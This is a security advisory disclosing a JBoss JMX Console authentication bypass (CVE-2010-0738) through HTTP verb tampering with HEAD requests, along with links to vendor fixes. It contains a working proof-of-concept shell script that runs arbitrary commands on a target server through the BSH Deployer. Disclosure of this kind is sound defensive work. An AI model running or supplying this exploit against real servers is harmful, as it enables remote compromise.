Minded Security Labs: Advisory #MSA030409
JMX Console Authentication Bypass via Verb Tampering
Tested Versions:
JMX Console - All Versions
Tested OS:
Linux, Solaris, Windows
Minded Security ReferenceID:
MSA030409
Credits:
Discovery by
Stefano Di Paola of Minded Security
stefano.dipaola [_at_] mindedsecurity.com
Contribution in Exploitation:
Giorgio Fedon of Minded Security
giorgio.fedon [_at_] mindedsecurity.com
Reference:
http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0738
Severity:
High: Jmx Console is often exposed to the internet or reachable by abusing
other vulnerabilities. This issue can lead to remote host compromise.
Solution:
A solution to this issue is already available.
See the following RedHat advisories:
https://rhn.redhat.com/errata/RHSA-2010-0376.html
https://rhn.redhat.com/errata/RHSA-2010-0377.html
https://rhn.redhat.com/errata/RHSA-2010-0378.html
https://rhn.redhat.com/errata/RHSA-2010-0379.html
Summary
Minded Security Consultants discovered during a penetration testing activity that
JMX Console authentication can be bypassed.
This issue will lead to remote code execution if BSH deployer or other administrative
modules are available in the console panel.
Analysis
JMX Console can be secured (protected by password) using the security configuration
available in:
jboss/server/default/deploy/jmx-console.war/WEB-INF/web.xml
This is the suggested security configuration also available in Jboss official
security guidelines ("White Paper on JMX Security"):
https://jira.jboss.org/jira/browse/SECURITY-31
The suggested configuration for protecting the JMX Console is the following one:
<security-constraint>
<web-resource-collection>
<web-resource-name>HtmlAdaptor</web-resource-name>
<description>An example security config that only allows users with
the role JBossAdmin to access the HTML JMX console web application
</description>
<url-pattern>/*</url-pattern>
<http-method>GET</http-method>
<http-method>POST</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>JBossAdmin</role-name>
</auth-constraint>
</security-constraint>
From the configuration above, security restrictions are enabled only for "GET" and
"POST" methods. Any other HTTP method supported by the server will be not restricted.
By issuing a request with the "HEAD" method is possible to invoke directly, with
"JBossAdmin" privilege, any functionality implemented by the jmx-console without
valid credentials. Note: If JMX console replies with a HTTP 500 error the request
has been correctly processed.
The following proof of concept ("jboss-shell.sh") was written by Minded Security
consultants to execute arbitrary commands on the remote host through the "BSH Deployer"
component of the JMX Console.
The command output gets redirected temporarily on JBOSS server status for a couple of
seconds.
Remote "Jboss-shell.sh" Proof of Concept
Note: The following script should be modifies to meet your environment configuration
AA=$1
COM_=`php -r '$arg=$argv[1];for($i=0;$i<strlen($arg);$i++) {printf("%%%02x",ord($arg[$i]));}echo "\n";' 'import java.io.*;
import java.net.*;
String[] s=new String[] {"/bin/sh","-c","'"$AA"'"};
Process p = Runtime.getRuntime().exec(s);
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String e=dis.readLine();
String message=e;
while(e!=null){
e= dis.readLine();
message+="|"+e;
}
String mess = message.replaceAll(" ","+").replaceAll("#","%23");
URL u = new URL("http://jbossserver:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.deployer%3Aservice%3DBSHDeployer&methodName=createScriptDeployment&argType=java.lang.String&arg0=%54%68%72%65%61%64%2e%73%6c%65%65%70%28%33%30%30%30%29%3b&argType=java.lang.String&arg1=soap&null|"+mess);
HttpURLConnection con = (HttpURLConnection) u.openConnection ();
con.setDoInput(true);
con.setRequestProperty("Cookie","MODIFY ME IF NEEDED");
con.setRequestMethod("HEAD");
con.connect();
con.getResponseMessage();
con.disconnect();'`
HOSTPATH="http://jbossserver:8080";
curl -s "$HOSTPATH/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.deployer%3Aservice%3DBSHDeployer&methodName=createScriptDeployment&argType=java.lang.String&arg0=$COM_&argType=java.lang.String&arg1=soap" -g -X HEAD -H "Cookie:MODIFY ME IF NEEDED" &
sleep 1
curl "$HOSTPATH/status?full=true" -s -g -H "Cookie:MODIFY ME IF NEEDED" | grep 'null|.*|null' -o|perl -i -pe 's/\|/\n/g'
Disclosure Timeline
03/04/2009 Issue found
06/03/2010 Reported to Vendor
Disclaimer
The information within this paper may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use or spread of this
information.
Any use of this information is at the user's own risk.
Permission is hereby granted for the redistribution of this Alert
electronically. It is not to be edited in any way without express
consent of Minded Security Research Lab. If you wish to reprint the
whole or any part of this Alert in any other medium excluding
electronic medium, please e-mail research_at_mindedsecurity.com
for permission.
Copyright (c) 2010 Minded Security, S.r.l..
All rights reserved worldwide.
